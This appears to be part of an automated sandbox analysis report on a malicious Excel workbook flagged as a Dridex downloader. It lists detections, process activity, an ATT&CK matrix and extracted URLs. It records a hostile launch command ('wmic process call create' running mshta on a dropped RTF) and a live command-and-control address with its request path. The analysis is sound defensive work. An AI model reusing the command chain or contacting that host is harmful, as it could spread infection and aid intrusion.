      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://tasks.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://wus2.contentsync.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 132.148.135.183:8080Connection: Keep-Alive

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\UXcqTE.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 474556085436219490680.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 474556085436219490680.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 0000000A.00000002.389782901.0000000000DD0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\UXcqTE.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 474556085436219490680.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 60
      Source: 474556085436219490680.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: 474556085436219490680.xlsbVirustotal: Detection: 28%
      Source: 474556085436219490680.xlsbReversingLabs: Detection: 22%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\UXcqTE.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\UXcqTE.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\UXcqTE.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4848:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{82298B76-E742-412E-832C-DA03DD2C2E92} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal92.troj.expl.evad.winXLSB@5/9@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 474556085436219490680.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: 474556085436219490680.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: 474556085436219490680.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: B6E3948D.tmp.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: B6E3948D.tmp.0.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: uxcqte.rtf
      Source: unknownProcess created: cmd line: uxcqte.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 0000000C.00000002.549766149.00000238E4A90000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: mshta.exe, 0000000C.00000002.549766149.00000238E4A90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 0000000C.00000002.549766149.00000238E4A90000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: mshta.exe, 0000000C.00000002.549766149.00000238E4A90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingProcess Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      474556085436219490680.xlsb28%VirustotalBrowse
      474556085436219490680.xlsb22%ReversingLabsDocument-Office.Trojan.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%VirustotalBrowse
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
        high
        https://login.microsoftonline.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
          high
          https://shell.suite.office.com:14434B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
              high
              https://autodiscover-s.outlook.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                high
                https://roaming.edog.4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                • URL Reputation: safe
                unknown
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                  high
                  https://cdn.entity.4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                        high
                        https://powerlift.acompli.net4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v14B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                          high
                          https://cortana.ai4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                    high
                                    https://api.aadrm.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                          high
                                          https://cr.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                            high
                                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://portal.office.com/account/?ref=ClientMeControl4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                              high
                                              https://graph.ppe.windows.net4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.aadrm.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                          high
                                                          https://dev0-api.acompli.net/autodetect4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                        high
                                                                                        https://outlook.office365.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/init4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                        high
